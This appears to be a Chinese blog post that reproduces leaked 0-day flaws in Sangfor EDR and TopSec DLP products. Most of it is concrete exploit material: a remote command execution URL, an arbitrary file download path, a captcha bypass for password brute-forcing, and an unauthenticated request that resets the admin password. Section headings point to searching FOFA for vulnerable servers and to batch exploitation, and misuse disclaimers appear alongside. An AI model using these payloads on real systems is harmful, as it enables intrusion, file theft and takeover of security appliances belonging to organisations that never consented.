当你的才华
还撑不起你的野心时
那你就应该静下心来学习
目录
友情提示:不是自己公司的服务器不要去试,你任何的动作,别人都知晓,人外有人,天外有天,且行且珍惜... ...
0x06 天融信DLP 最新版本V3.1130.308ps3_DLP.1 未授权访问导致越权修改管理员密码
本来忙的都没时间看文章,没时间干其它的事,但还是想写一波复现文章,主要还是深信服的终端复现,谁让... ..
还迷迷糊糊的就听到爆了好多0day,感觉不简单,别问我,我也不清楚,也不敢多说什么,牵制到太多.. .. ,参考了公众号和一些师傅们的思路和复现文章,自己再复现一下看看,请勿用作犯罪使用,网络不是法外之地,请珍惜生命,勿触犯法律... ...
本次爆0day 列表:
1. 天擎EDR
2. 深信服VPN
3. 深信服EDR
4. 天融信DLP
其中最惨的当属深信服(每年都躺枪,都哭了)
0x01 深信服EDR 长啥样?
0x02 深信服EDR RCE
0x03 漏洞简单简单利用方法
任意执行命令
Linux 读取文件内容命令
more和less一般用于显示文件内容超过一屏的内容,并且提供翻页的功能。
more比cat强大,提供分页显示的功能,less比more更强大,提供翻页,跳转,查找等命令。
而且more和less都支持:用空格显示下一页,按键b显示上一页。下面详细介绍这3个命令。
1)cat 后面跟要查看的文件,文件内容全部输出到屏幕,
2)more 文件内容或输出查看工具;
more 是我们最常用的工具之一,最常用的就是显示输出的内容,然后根据窗口的大小进行分页显示,然后还能提示文件的百分比;
3)less 查看文件内容
https://xxx.xxx.xxx:9443/tool/log/c.php?strip_slashes=system&host=more%20/XXXXX/l.php
任意文件下载漏洞复现
下载一个存在的文件,你懂我的意思吧?可以下载任意文件,不限制目录哦
https://xxx.xxx.xxx:9443/tool/log/a
验证码绕过
// 校验验证码
if (!ldb_run_at_console()) {
if (isset($_REQUEST["captcha"])
|| $_REQUEST["captcha"] != base64_decode("M...
echo "<font color='red'><b>验证码不对,请输入..."
return;
}
}
先输入几次错误密码,把验证码弄出来后,开启Burp(抓包工具)爆破密码即可,只要验证码第一次输入对后不为空,即可绕过
友情提示:不是自己公司的服务器不要去试,你任何的动作,别人都知晓,人外有人,天外有天,且行且珍惜... ...
0x04 FoFa 搜索相关漏洞服务器
0x05 批量利用方法
分析漏洞原文章
0x06 天融信DLP 最新版本V3.1130.308ps3_DLP.1 未授权访问导致越权修改管理员密码
网上就只有一张截图,推测是调用了mod_pwd 修改密码模块时,没有进行校验原密码+该api接口未授权访问,组合利用,导致管理员密码可被越权修改
POST /?module=auth_user&action=mod_edit_pwd HTTP/1.1
Host:xxxx
剩下的一些参数省略.... ...
uid=1&pd=Tftp@dlp108&mod_pwd=1&dlp_perm=1
参考文章:
https://www.cnblogs.com/potatsoSec/p/13520546.html
https://mp.weixin.qq.com/s/4VtJ_M0c5GZsV4CmBr9CsQ
https://www.cnblogs.com/potatsoSec/p/13520546.html
虽然我们生活在阴沟里,但依然有人仰望星空!